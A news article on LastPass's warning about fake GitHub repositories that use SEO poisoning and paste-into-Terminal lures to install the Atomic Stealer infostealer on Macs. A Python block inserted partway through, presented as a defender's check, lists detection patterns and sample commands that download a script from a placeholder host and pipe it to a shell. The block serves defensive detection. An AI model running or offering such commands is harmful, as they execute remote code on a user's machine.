LastPass Sounds Alarm on Mac Malware Posing as Open-Source Tools
Mac users are facing a new threat as LastPass reveals a widespread campaign distributing the Atomic Stealer malware. Cybercriminals are using fake GitHub repositories to trick victims into downloading malicious apps disguised as legitimate software and development tools, putting sensitive data at risk.

LastPass is sounding the alarm about a widespread campaign where hackers are using bogus GitHub repositories to spread malware. They're tricking people into downloading malicious programs disguised as legitimate tools.
According to LastPass's Threat Intelligence team, these fake repositories are redirecting victims to download the Atomic infostealer malware. Watch out!
What Apps Are Being Impersonated?
It's not just LastPass! The attackers are mimicking a bunch of popular apps, including:
- 1Password
- Basecamp
- Dropbox
- Gemini
- Hootsuite
- Notion
- Obsidian
- Robinhood
- Salesloft
- SentinelOne
- Shopify
- Thunderbird
- TweetDeck
The goal? To target macOS systems specifically.
How the Attack Works
These hackers are using a technique called Search Engine Optimization (SEO) poisoning. This means they're manipulating search results on Google and Bing to push these malicious GitHub links to the top. If you click on one, you'll be told to download the program by clicking something like "Install LastPass on MacBook," which takes you to a fake GitHub page.
"The GitHub pages appear to be created by multiple GitHub usernames to get around takedowns," LastPass warns. So, even if one gets taken down, they'll pop up again.
That GitHub page then sends you to another domain. There, you'll find instructions (think ClickFix-style instructions) that tell you to copy and paste a command into your Terminal app. Do that, and you'll unleash the Atomic Stealer malware onto your system.
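A defender-side check for the paste-into-Terminal step described above, added here as an example and not taken from LastPass or the original article. It flags command shapes commonly seen in paste-and-run lures; the rule set, the function name and the sample commands are assumptions constructed for illustration.

```python
import re

# Assumed shapes of paste-and-run one-liners; these are illustrative
# heuristics, not indicators published in the LastPass report.
_SHELL = r"(?<![\w-])(?:/(?:usr/)?bin/)?(?:ba|z|da|k)?sh\b"
RULES = [
    ("download piped into a shell",
     re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:sudo\s+)?" + _SHELL)),
    ("shell runs the output of a download",
     re.compile(_SHELL + r"\s+-c\s+[\"']?\$\(\s*(?:curl|wget)\b")),
    ("part of the command is hidden in base64",
     re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b")),
]


def review_pasted_command(text: str) -> list[str]:
    """Return the reasons a pasted Terminal command deserves a second look."""
    # Join backslash-newline continuations so a command split across
    # lines is matched as the single command the shell would run.
    joined = text.replace("\\\n", " ")
    return [reason for reason, pattern in RULES if pattern.search(joined)]


# Constructed samples; example.invalid never resolves.
SAMPLES = [
    "curl -fsSL https://example.invalid/install.sh | bash",
    '/bin/bash -c "$(curl -fsSL https://example.invalid/install.sh)"',
    "curl -s $(echo '<base64-text>' | base64 -d) \\\n  | zsh",
    "brew install --cask obsidian",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        findings = review_pasted_command(sample) or ["no paste-and-run pattern"]
        print(findings, "<-", sample)
```

A hit describes the shape of the command, not its intent: legitimate installers use the same patterns, so a match means checking where the instructions came from before running anything.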
Similar Attacks in the Past
This isn't the first time we've seen this kind of trickery. Remember the malicious sponsored Google Ads for Homebrew? That also used a fake GitHub repository to distribute malware. Security researcher Dhiraj Mishra has a good write-up on that.
And recently, hackers have been using GitHub to host malicious payloads distributed via Amadey, and even employing dangling commits to redirect users to malicious programs.
Stay Vigilant!
The takeaway? Be super careful when downloading software, especially from links in search results. Double-check the source, and if something seems fishy, it probably is.